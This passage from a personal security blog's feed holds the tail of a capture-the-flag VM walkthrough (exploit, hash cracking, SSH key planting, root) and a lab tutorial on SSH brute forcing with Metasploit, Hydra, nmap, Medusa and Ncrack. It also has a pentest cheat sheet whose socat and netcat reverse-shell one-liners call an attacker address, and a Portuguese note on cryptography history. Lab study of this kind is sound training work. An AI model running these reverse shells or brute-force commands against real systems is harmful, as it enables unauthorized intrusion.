&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/05-ona-page.png&quot; alt=&quot;OnaDir&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The Ona 18.1.1 is running and have known vulnerabilities and also
working exploits.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/05a-ona-exploitdb.png&quot; alt=&quot;OnaExploit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Yes! Exploit-db shows a metasploit module for this vulnerabilty. Let’s
try to search it in MSF.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/05b-ona-exploit.png&quot; alt=&quot;OnaExploit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;At this part, i had a problem to solve that was Metasploit haven’t the
Ona exploit module already installed and i had to install manually.
That’s why i searched using searchsploit tool before. To install a non
existent module in MSF you have to copy the .rb file to its directory
(/usr/share/metasploit-framework/modules/exploits/) and update its
database (updatedb). After updating you have to restart metasploit to
have the exploit appearing in searches.&lt;/p&gt;

&lt;p&gt;I’ve chosen the directory and file names like that
(/usr/share/metasploit-framework/modules/exploits/linux/http/opennetadmin.rb).
You can chose yours as you wish but it`s a good practice put it inside
its location. You can see that detail just opening the .rb file and
reading the description of module.&lt;/p&gt;

&lt;h2 id=&quot;exploitation&quot;&gt;Exploitation&lt;/h2&gt;

&lt;p&gt;Now it’s time to exploit the first phase of writeup.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/05c-ona-metasploit.png&quot; alt=&quot;OnaExploit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Session created. Now we have access to the VM Shell through MSF.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/06a-www-id.png&quot; alt=&quot;www-user&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As usual, we start the phase of privilege escalation with enumeration.
In the very beginning, i’ve tried a lot of enumeration like sudo
permission, file permission, mails, hidden directories and other initial
scans like linenum and post exploitation modules in metasploit. The only
one thing i forgot to try was the first directory that popped when i’ve
exploited the ona vulnerability. Because of that, i’ve lost some time
trying other methods. It helps to be an advice: Always enumerate every
single place that you have access. The answer is the next screenshot:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/06-www-directory.png&quot; alt=&quot;www-user&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We can see the username and its hash in the .htpasswd file. The author
also sent a tip to not use regular wordlists but create a new one using
10 chars and the letters &lt;strong&gt;aefhrt&lt;/strong&gt;. For this part i’ve used the Crunch
tool to create our dictionary and after that we start the decryption
tool hashcat to crack its password.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/07-dictionary.png&quot; alt=&quot;crunch&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/08a-hashcat-cracking-hash.png&quot; alt=&quot;hashcat&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/08-hashcat-cracking-hash.png&quot; alt=&quot;hashcat&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Having the douglas password now we can try to access his shell using ssh
or even su in the www shell.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ ssh douglas@192.168.56.15 (password fatherrrrr)
or
$ su douglas
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/09-ssh-douglas-password.png&quot; alt=&quot;douglas&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Enumerating douglas account we can see an interesting result when i’ve
tried sudo -l. It shows that user jen has access to run the command cp
without any password. Thinking malicious, if you have access to copy any
file using another account you should for example put some files inside
their home directory. So, why not to try copying a generated by me ssh
key to his .ssh directory and ssh there ? Let’s try.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/10-enumerate-douglas.png&quot; alt=&quot;douglas&quot; /&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Generating the ssh key to exploit Jen’s ssh access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/11-creating-jen-sshkey.png&quot; alt=&quot;douglas&quot; /&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Next steps are: chmod 777 the id_rsa.pub file and copy to .ssh
directory inside Jen’s home directory as authorized_keys file.
After that just try to ssh using jen’s “new” key.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/12-accessing-jen-ssh.png&quot; alt=&quot;douglas&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Since we have access to Jen’s account it’s time, as usual, to enumerate
the user.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/13-enumerating-jen.png&quot; alt=&quot;jens-account&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Two interesting things about exim4 application and Jen has an unread
mail in his box. About exim4, it’s good to mention that exim on this
version has some known vulnerability and i’ve tried to exploit it but
had no success (rabbit hole). Another known vulnerabilty is shown about
its kernel (Linux five86-1 4.19.0-6-amd64 #1 SMP Debian
4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux) and i also tried to
exploit using known exploits but no success too.&lt;/p&gt;

&lt;p&gt;So, having failures exploiting exim and kernel, let’s try to see the
jen’s mailbox.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/14-mail-jen.png&quot; alt=&quot;jens-account&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Gotcha! Jen’s mailbox message has the information of another user
(moss). Let’s try to access moss account using its password (Fire!Fire!)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/15-ssh-moss.png&quot; alt=&quot;moss-account&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The final step is to enumerate moss account as usual. After looking for
files with permission we’ve found a file that could be executed by moss.
Looks like a game. Lets execute it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/16-moss-flag.png&quot; alt=&quot;moss-account&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Running the game i’ve answered the questions and it popped the root
shell.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;That’s all folks!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Thanks for reading&lt;/p&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="infosec" /><category term="pentest" /><category term="writeup" /><summary type="html">Hi guys,</summary></entry><entry><title type="html">How to brute force SSH - Some Tools</title><link href="https://humbertojunior.com.br/infosec/pentest/2020/01/17/ssh-bruteforce-some-tools.html" rel="alternate" type="text/html" title="How to brute force SSH - Some Tools" /><published>2020-01-17T00:00:00-03:00</published><updated>2020-01-17T00:00:00-03:00</updated><id>https://humbertojunior.com.br/infosec/pentest/2020/01/17/ssh-bruteforce-some-tools</id><content type="html" xml:base="https://humbertojunior.com.br/infosec/pentest/2020/01/17/ssh-bruteforce-some-tools.html">&lt;p&gt;Hello guys, in this topic I’ll show you some tools and its commands to
start a brute force in SSH servers.&lt;/p&gt;

&lt;p&gt;Disclaimer: First of all, it’s good to say that you should not run this
kind of tool on servers that you don’t have permission to scan. The
risks of doing something like that is at your own.&lt;/p&gt;

&lt;h2 id=&quot;brute-force-attack&quot;&gt;Brute Force Attack&lt;/h2&gt;

&lt;p&gt;From &lt;a href=&quot;https://en.wikipedia.org/wiki/Brute-force_attack&quot;&gt;Wikipedia&lt;/a&gt;:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;In cryptography, a brute-force attack consists of an attacker
submitting many passwords or passphrases with the hope of eventually
guessing correctly. The attacker systematically checks all possible
passwords and passphrases until the correct one is found. Alternatively,
the attacker can attempt to guess the key which is typically created
from the password using a key derivation function. This is known as an
exhaustive key search.&lt;/em&gt;&lt;/p&gt;

&lt;h2 id=&quot;our-target-and-stuffs&quot;&gt;Our target and “Stuffs”&lt;/h2&gt;

&lt;p&gt;I’ve created an Virtualbox VM using Ubuntu 18.04 and installed the
OpenSSH. After that, an user &lt;em&gt;admin&lt;/em&gt; was added with a known password. We
will also use a known wordlist to conduct our brute force.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# useradd admin

# passwd admin (using the password &quot;fuckyou&quot;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Testing our target using user and password above:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/ssh.png&quot; alt=&quot;SSH&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;metasploit&quot;&gt;Metasploit&lt;/h2&gt;

&lt;p&gt;Metasploit is a tool developed by Rapid7 (https://www.metasploit.com/)
and used to execute scans, exploits and other pentest phases.&lt;/p&gt;

&lt;p&gt;You can have more information about the Framework in the free Offensive
Security course at:
(https://www.offensive-security.com/metasploit-unleashed/)&lt;/p&gt;

&lt;p&gt;Let’s run Metasploit to start the brute force in our virtual machine IP
address (192.168.56.13).&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ msfdb run
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now let’s search for an auxiliary module that should be used to root
password guess on this ip address.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/metasploit01.png&quot; alt=&quot;Metasploit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As we can see in the image above, there is a module
&lt;em&gt;auxiliary/scanner/ssh/ssh_login&lt;/em&gt; that we could use to check for
username and password. Let’s chose this one and show its options
(command show options).&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/metasploit02.png&quot; alt=&quot;Metasploit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Now we have to change some options to configure the module.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/metasploit03.png&quot; alt=&quot;Metasploit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We’ve used the rockyou wordlist to configure our brute force. Feel free
to use your wordlist or create a new one. Since we know the username
(admin), we just set the password option to use a wordlist. We’ve also
changed the threads number to 10 so the process will be faster (locally
of course). We’ve set STOP_ON_SUCCESS so it stops when the password is
found. Now, time to RUN!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/metasploit04.png&quot; alt=&quot;Metasploit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Gotcha! Session 1 was opened after msf discover the password.&lt;/p&gt;

&lt;h2 id=&quot;thc-hydra&quot;&gt;THC Hydra&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Number one of the biggest security holes are passwords, as every
password security study shows. This tool is a proof of concept code, to
give researchers and security consultants the possibility to show how
easy it would be to gain unauthorized access from remote to a system.
There are already several login hacker tools available, however, none
does either support more than one protocol to attack or support
parallelized connects.&lt;/em&gt; copied from his
&lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot;&gt;github&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Accordingly author, the hydra could work well on Linux, Windows/Cygwin,
Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS. If you are
using Kali Linux the tool is already installed.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/hydra01.png&quot; alt=&quot;THC Hydra&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Well, the hydra command for brute force testing on SSH service looks
like this:&lt;/p&gt;

&lt;p&gt;hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.13 ssh&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;-l : Name of user to be tested

-P : wordlist to be used for test

192.168.56.13 : server IP address

ssh : service to be tested
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Let’s test using hydra command&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/hydra02.png&quot; alt=&quot;THC Hydra&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Well, it works!&lt;/p&gt;

&lt;h2 id=&quot;nmap&quot;&gt;NMAP&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Nmap (“Network Mapper”) is a free and open source (license) utility for
network discovery and security auditing. Many systems and network
administrators also find it useful for tasks such as network inventory,
managing service upgrade schedules, and monitoring host or service
uptime. Nmap uses raw IP packets in novel ways to determine what hosts
are available on the network, what services (application name and
version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in
use, and dozens of other characteristics. It was designed to rapidly
scan large networks, but works fine against single hosts. Nmap runs on
all major computer operating systems, and official binary packages are
available for Linux, Windows, and Mac OS X. In addition to the classic
command-line Nmap executable, the Nmap suite includes an advanced GUI
and results viewer (Zenmap), a flexible data transfer, redirection, and
debugging tool (Ncat), a utility for comparing scan results (Ndiff), and
a packet generation and response analysis tool (Nping).&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;We can use nmap scripts to do some more advanced scans in servers for
vulnerabilities and even brute force. For this one we will use the
ssh-brute nse script to achieve our objective.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/nmap01.png&quot; alt=&quot;Nmap&quot; /&gt;&lt;/p&gt;

&lt;p&gt;For this test i’ve created two files (users.txt and pass.txt), filled
with admin user and the other with a little part of rockyou.txt wordlist
to be faster since we do not have the STOP on SUCCESS option and verbose
are always visible, making some noise display of results.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;nmap 192.168.56.13 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=pass.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/nmap02.png&quot; alt=&quot;Nmap&quot; /&gt;&lt;/p&gt;

&lt;p&gt;You can have more details at &lt;a href=&quot;https://nmap.org/nsedoc/scripts/ssh-brute.html&quot;&gt;nmap’s script
URL&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;medusa&quot;&gt;Medusa&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Medusa is intended to be a speedy, massively parallel, modular, login
brute-forcer. The goal is to support as many services which allow remote
authentication as possible.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;You can have more information at &lt;a href=&quot;http://foofus.net/goons/jmk/medusa/medusa.html&quot;&gt;Medusa
Website&lt;/a&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;medusa -h 192.168.56.13 -u admin -P /usr/share/wordlists/rockyou.txt -e s -M ssh

-h Target hostname or IP
-u username
-P wordlist
-e password checks (*n* No Password, *s* Passowrd=Username)
-M name of the module to execute
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/medusa01.png&quot; alt=&quot;Medusa&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;ncrack&quot;&gt;Ncrack&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Ncrack is a high-speed network authentication cracking tool. It was
built to help companies secure their networks by proactively testing all
their hosts and networking devices for poor passwords. Security
professionals also rely on Ncrack when auditing their clients. Ncrack
was designed using a modular approach, a command-line syntax similar to
Nmap and a dynamic engine that can adapt its behavior based on network
feedback. It allows for rapid, yet reliable large-scale auditing of
multiple hosts.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://nmap.org/ncrack/&quot;&gt;Ncrack’s Website&lt;/a&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;ncrack --user admin -P /root/pass.txt ssh://192.168.56.13

--user -&amp;gt; username to test
-P -&amp;gt; wordlist
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/ncrack01.png&quot; alt=&quot;Ncrack&quot; /&gt;&lt;/p&gt;

&lt;p&gt;That’s all for now folks! Thanks for reading.&lt;/p&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="infosec" /><category term="pentest" /><summary type="html">Hello guys, in this topic I’ll show you some tools and its commands to start a brute force in SSH servers.</summary></entry><entry><title type="html">Pentest Cheat Sheet</title><link href="https://humbertojunior.com.br/infosec/pentest/2020/01/09/pentest-cheat-sheet.html" rel="alternate" type="text/html" title="Pentest Cheat Sheet" /><published>2020-01-09T00:00:00-03:00</published><updated>2020-01-09T00:00:00-03:00</updated><id>https://humbertojunior.com.br/infosec/pentest/2020/01/09/pentest-cheat-sheet</id><content type="html" xml:base="https://humbertojunior.com.br/infosec/pentest/2020/01/09/pentest-cheat-sheet.html">&lt;p&gt;Uma reunião de alguns comandos que uso com frequência (para referência e CTRL+C / CTRL+V).&lt;/p&gt;

&lt;h2 id=&quot;port-scanning&quot;&gt;Port Scanning&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- masscan -e tun1 -p1-65535,U:1-65535 10.10.10.1 --rate=500
    
- nmap -e tun1 -n -v -Pn -p22,80 -A --reason -oN nmap.txt 10.10.10.1
- nmap -sSV --version-all --min-parallelism 64 --script=vuln 10.10.10.1 -Pn -n
- nmap -sV -sC -sT 10.10.10.1
- nmap -sV --script *vuln* -p- 10.10.10.1
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h2 id=&quot;some-fuzzing-things&quot;&gt;Some Fuzzing Things&lt;/h2&gt;

&lt;h3 id=&quot;gobuster&quot;&gt;Gobuster&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- gobuster dir -w some-wordlist.txt -x php -e -u http://10.10.10.1/ --timeout 30s
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;wfuzz&quot;&gt;wfuzz&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- wfuzz -w some-wordlist.txt --hc '403,404' http://10.10.10.1/FUZZ
- wfuzz -c -z file,wordlist.txt -z file,wordlist2.txt --hc 404 http://10.10.10.1:8080/FUZZ/FUZ2Z
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;ffuf--faster&quot;&gt;ffuf &amp;lt;==== Faster!!!!!&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- ffuf -c -w some-wordlist.txt -u http://10.10.10.1/subdir/FUZZ
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h2 id=&quot;reverse-shell&quot;&gt;Reverse Shell&lt;/h2&gt;

&lt;h3 id=&quot;socat&quot;&gt;Socat&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;On Attacker: socat file:`tty`,raw,echo=0 tcp-listen:4445
On Target:   socat tcp-connect:10.10.15.1:4445 exec:sh,pty,stderr,setsid,sigint,sane
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;netcat-w-e&quot;&gt;Netcat (w/ e)&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;On Attacker:    nc/netcat -l -n -v -p 4445
On Target:      nc/netcat -e /bin/bash &amp;lt;attacker_IP&amp;gt; &amp;lt;Attacker_Port&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;netcat-wo-e&quot;&gt;Netcat (w/o e)&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;On Attacker:    nc/netcat -l -n -v -p 4445
On Target:      rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&amp;gt;&amp;amp;1 | nc/netcat 10.0.0.1 4445 &amp;gt; /tmp/f
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h2 id=&quot;spanwning-shell&quot;&gt;Spanwning Shell&lt;/h2&gt;

&lt;h3 id=&quot;python&quot;&gt;Python&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- python -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;ruby&quot;&gt;Ruby&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- ruby: exec &quot;/bin/sh&quot;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;perl&quot;&gt;Perl&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- perl —e 'exec &quot;/bin/sh&quot;;'
- perl: exec &quot;/bin/sh&quot;;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;from-vi-or-vim&quot;&gt;From vi or vim&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- :!bash
- :!/bin/bash
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="infosec" /><category term="pentest" /><summary type="html">Uma reunião de alguns comandos que uso com frequência (para referência e CTRL+C / CTRL+V).</summary></entry><entry><title type="html">Fatos Interessantes Sobre a Criptografia</title><link href="https://humbertojunior.com.br/criptografia/2019/07/05/fatos-interessantes-sobre-a-criptografia.html" rel="alternate" type="text/html" title="Fatos Interessantes Sobre a Criptografia" /><published>2019-07-05T00:00:00-03:00</published><updated>2019-07-05T00:00:00-03:00</updated><id>https://humbertojunior.com.br/criptografia/2019/07/05/fatos-interessantes-sobre-a-criptografia</id><content type="html" xml:base="https://humbertojunior.com.br/criptografia/2019/07/05/fatos-interessantes-sobre-a-criptografia.html">&lt;p&gt;A Criptografia, assim como a Criptoanálise e as diversas vertentes dessa
área fascinante da Segurança da Informação tem uma história bem
interessante e é cheia de teorias deslumbrantes e até mesmo engraçadas
no ponto de vista mais atual. Vale a pena o estudo e pesquisa para
conhecermos um pouco mais sobre a arte de esconder mensagens.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;O primeiro exemplo documentado de escrita cifrada foi considerada
por um grupo de estudiosos aconteceu +/- em 1900 a.c. em uma vila
egípcia perto do rio Nilo, chamada Menet Khufu, onde foi encontrado
o túmulo de Khnumhotep II que continha alguns hieróglifos que foram
substituídos por outros mais “importantes e bonitos”.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Os relatos do uso da esteganografia remonta os idos de 1500 a.c.,
quando eram feitas tatuagens na cabeça de escravos contendo a
mensagem. Para ocultá-las, porém, era preciso esperar o cabelo
crescer para esconder a mensagem. Para decifrar, só era necessário
raspar o cabelo.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Um livro atribuído a Kautilya, chamado Artha-sastra, é escrito na
índia +/- em 300 a.c. e cita diversas cifras criptográficas e
recomenda uma variedade de métodos de criptoanálise para obter
relatórios de espionagem. Todos os processos descritos são
recomendados apenas para o uso de diplomatas.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;O texto “Elementos”, de autoria do matemático grego Euclides de
Alexandria, que viveu entre 220 e 270 a.c. é o livro mais publicado
da história da humanidade, contrariando os números que dizem que o
título seria da bíblia. O livro compila e sistematiza o que se
conhecia na época sobre geometria e teoria dos números, e que é uma
grande influência na moderna criptologia feita por computador.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Em Uruk, região do atual Iraque, aproximadamente em 130 a.c.,
escribas transformam seus nomes em números dentro do emblema que
identifica seus trabalhos (Somente para divertir os leitores).&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;O Quadrado Latino é encontrada em escavações feitas em Pompéia,
inscrita numa coluna. As palavras rotas arepo tenet opera sator
parecem ter o efeito mágico de nunca desaparecerem e persistem até
hoje como um enigma de transposição.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;O Kama-Sutra, 400 d.c., classifica a criptografia como a 44ª e 45ª
das 64 artes que as pessoas deveriam conhecer e praticar.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Os famosos Templários (1119-1311 d.c.), escreviam suas cartas de
crédito com um método próprio de cifragem extraído da cruz chamada
“das oito beatitudes” e que constituía o emblema da ordem.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Michele Steno, dodge de Veneza (1411 d.c.), dá um dos primeiros
exemplos de cifras homofônicas: escolhia vários símbolos para cada
letra, além de utilizar nulos e caracteres especiais para certas
palavras de uso frequente.&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Apenas alguns fatos históricos foram mencionados. Recomendo a leitura e
pesquisa.&lt;/p&gt;

&lt;p&gt;Para quem se interessa pelo assunto:&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;http://www.numaboa.com.br&quot;&gt;Site Numaboa&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Livro: Códigos &amp;amp; Cifras da Antiguidade à era Moderna&lt;/p&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="criptografia" /><summary type="html">A Criptografia, assim como a Criptoanálise e as diversas vertentes dessa área fascinante da Segurança da Informação tem uma história bem interessante e é cheia de teorias deslumbrantes e até mesmo engraçadas no ponto de vista mais atual. Vale a pena o estudo e pesquisa para conhecermos um pouco mais sobre a arte de esconder mensagens.</summary></entry></feed>